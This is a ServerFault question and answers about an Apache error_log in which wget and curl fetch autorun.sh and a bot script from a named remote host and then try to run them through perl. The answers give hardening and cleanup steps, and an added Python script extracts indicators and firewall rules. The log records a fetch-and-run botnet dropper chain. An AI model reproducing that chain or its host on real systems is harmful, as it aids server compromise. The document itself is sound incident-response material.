Linux

Apache error log

  • July 19, 2011

I am facing a problem with Apache. The following log shows up in the error_log file.

--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

    0K                                                       100% 51.6M=0s

15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: `b0t3.txt'

    0K .......... .......... ........                        100% 8.75M=0.003s

15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]

sh: fetch: command not found
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

    0K                                                       100% 31.8M=0s

15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0

How can I prevent this?

It looks like someone is trying to use one of your possibly vulnerable web pages to download and run a perl script. - Try to disable execution of all interpreters (perl, python, curl, c, etc.).

  • I assume it may be apache + php; if so, you may want to disable: allow_url_fopen = Off, which disables downloading through PHP.
  • Add httpd mod_security
  • Fix the vulnerable web script
  • Open the outgoing firewall for certain ips/ports

You have a script somewhere that fetches what looks like botnet scripts and tries to save and run them locally. That did not happen, which is why it is in the error file.

  • Block the bandits ip (though there are probably several more)
  • Find that script (grep for the bandits url)
  • Find out what that script uses to retrieve the files (block it if you can)

  • Download and scan with rkhunter
  • Look at your mail queue
  • Watch for odd things in your process list

-Sean
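The two answers above boil down to one triage procedure: pull the remote host, IP and dropped file names out of the error_log, grep the web root for the host, and block the IP outbound. The following script is an added example and not code from either answer or from the original thread. It parses the wget / fetch / curl / lwp-download footprints shown in the question and returns those indicators; the sample log is constructed from the lines quoted above, the iptables syntax assumes a Linux host with iptables, and the web root path in the usage line is an assumption.

```python
"""Triage an Apache error_log excerpt for download-chain indicators.

Added example, not code from the ServerFault thread.  It extracts the
remote host/IP to block, the dropped file names to hunt for, which download
tools the shell probed for, and which interpreters the OS refused to run.
"""
import re
from dataclasses import dataclass, field

# Constructed from the error_log lines quoted in the question.
SAMPLE_LOG = """\
--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
Saving to: `autorun.sh'
15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]
sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]
sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]
sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0
"""

# wget banner: "--HH:MM:SS--  URL"
WGET_URL = re.compile(r"^--\d\d:\d\d:\d\d--\s+(?P<url>https?://\S+)")
# wget resolver line: "Resolving host... A.B.C.D"
WGET_RESOLVE = re.compile(r"^Resolving (?P<host>\S+)\.\.\.\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})")
# wget completion line: "HH:MM:SS (rate) - `file' saved [got/total]"
WGET_SAVED = re.compile(r"^\d\d:\d\d:\d\d \([^)]*\) - `(?P<file>[^']+)' saved \[(?P<size>\d+)/\d+\]")
# the shell probing for a downloader that is not installed
SH_MISSING = re.compile(r"^sh: (?P<tool>[^:]+): command not found")
# the OS refusing to run a helper or interpreter (here: perl)
SH_DENIED = re.compile(r"^sh: (?P<path>\S+?):.*Permission denied")
# curl's progress-meter header; curl never logs what it fetched
CURL_METER = re.compile(r"^\s*% Total\s+% Received")


@dataclass
class Triage:
    urls: list = field(default_factory=list)      # remote URLs wget fetched, deduplicated
    hosts: dict = field(default_factory=dict)     # host -> resolved IP (firewall candidates)
    dropped: dict = field(default_factory=dict)   # saved file name -> byte count (hunt on disk)
    missing_tools: set = field(default_factory=set)
    denied: list = field(default_factory=list)    # helpers/interpreters the OS refused
    curl_runs: int = 0

    def is_dropper_chain(self) -> bool:
        # A remote file landed on disk AND the shell was probing for tools or
        # launching an interpreter: the pattern both answers describe.
        return bool(self.dropped) and bool(self.missing_tools or self.denied)


def triage(log_text: str) -> Triage:
    t = Triage()
    for line in log_text.splitlines():
        m = WGET_URL.match(line)
        if m:
            if m["url"] not in t.urls:
                t.urls.append(m["url"])
            continue
        m = WGET_RESOLVE.match(line)
        if m:
            t.hosts[m["host"]] = m["ip"]
            continue
        m = WGET_SAVED.match(line)
        if m:
            t.dropped[m["file"]] = int(m["size"])
            continue
        m = SH_MISSING.match(line)
        if m:
            t.missing_tools.add(m["tool"])
            continue
        m = SH_DENIED.match(line)
        if m:
            t.denied.append(m["path"])
            continue
        if CURL_METER.match(line):
            t.curl_runs += 1
    return t


def grep_pattern(t: Triage) -> str:
    """Regex for grepping the web root for the script that carries the URL."""
    return "|".join(re.escape(h) for h in sorted(t.hosts))


def firewall_rules(t: Triage) -> list:
    """Outbound DROP rules for the resolved IPs (assumes an iptables host)."""
    return ["iptables -A OUTPUT -d %s -j DROP" % ip for ip in sorted(set(t.hosts.values()))]


if __name__ == "__main__":
    r = triage(SAMPLE_LOG)
    print("dropper chain:", r.is_dropper_chain(), "hosts:", r.hosts, "dropped:", r.dropped)
    print("grep -rE '%s' /var/www   # web root path is an assumption" % grep_pattern(r))
    print("\n".join(firewall_rules(r)))
```

Run it against the real error_log instead of SAMPLE_LOG to get the host list for the grep and the IP list for the firewall; the `denied` entries tell you which interpreter the OS already refused, and the `dropped` names are what to look for in /tmp and the web server's writable directories.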

Quoted from: https://serverfault.com/questions/291840